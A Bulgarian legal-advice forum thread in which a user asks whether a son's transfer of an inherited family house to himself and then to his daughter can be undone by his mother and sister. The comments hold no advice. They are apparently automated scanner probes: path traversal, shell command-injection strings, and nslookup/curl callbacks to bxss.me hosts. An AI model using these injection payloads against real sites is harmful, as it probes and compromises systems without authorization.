Деление на имот

30.05.2010г. 03:24:04
Става въпрос за една къща с двор. Имотът се води на Х.Г.А. Той е починал и негови наследници са съпругата му, дъщеря му и синът му. Но синът му живее в този имот от 25 години, но преди 4-5 години той е прехвърлил имота на свое име и от там чрез покупко-продажба го е прехвърлил на дъщеря си ( която се пада внучка на Х.Г.А.). И през този период от 25 години дъщеря му на Х.Г.А. е ходила там до къщата,но не е допускана да влиза там от брат си ( синът на Х.Г.А.) дори се е стигало до полиция. Въпросът ми е дали това прехвърляне може да бъде развалено по някакъв начин, защото дъщерята и съпругата на Х.Г.А. са си живи и здрави и си търсят собственото. Разбрахме че по закон при 10 години владеене без заинтересованост от останалите наследници имотът може да бъде прехвърлен законно, но при условие че останалите наследници не се допускани по никъкъв начин да влезнат там, как да си тарсят собственото. Кажете какво можем да направим?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:36
../
lxbfYeaa
05.10.2023г. 07:36
echo ijnilt$()\ czdcph\nz^xyu||a #' &echo ijnilt$()\ czdcph\nz^xyu||a #|" &echo ijnilt$()\ czdcph\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:36
&echo cbguoi$()\ qltbme\nz^xyu||a #' &echo cbguoi$()\ qltbme\nz^xyu||a #|" &echo cbguoi$()\ qltbme\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:36
|echo uvjdcr$()\ jiencv\nz^xyu||a #' |echo uvjdcr$()\ jiencv\nz^xyu||a #|" |echo uvjdcr$()\ jiencv\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:36
(nslookup -q=cname hitdtrjeiafzvc0db5.bxss.me||curl hitdtrjeiafzvc0db5.bxss.me))
lxbfYeaa
05.10.2023г. 07:36
$(nslookup -q=cname hitxvuobstqed847a5.bxss.me||curl hitxvuobstqed847a5.bxss.me)
lxbfYeaa
05.10.2023г. 07:36
&nslookup -q=cname hitznqwdwmswo3dd81.bxss.me&'\"`0&nslookup -q=cname hitznqwdwmswo3dd81.bxss.me&`'
lxbfYeaa
05.10.2023г. 07:36
&(nslookup -q=cname hitvnxbpwqrfo13aa8.bxss.me||curl hitvnxbpwqrfo13aa8.bxss.me)&'\"`0&(nslookup -q=cname hitvnxbpwqrfo13aa8.bxss.me||curl hitvnxbpwqrfo13aa8.bxss.me)&`'
lxbfYeaa
05.10.2023г. 07:36
|(nslookup -q=cname hitncwthvzwuo44906.bxss.me||curl hitncwthvzwuo44906.bxss.me)
lxbfYeaa
05.10.2023г. 07:36
`(nslookup -q=cname hitqakonwheuba71b3.bxss.me||curl hitqakonwheuba71b3.bxss.me)`

Коментар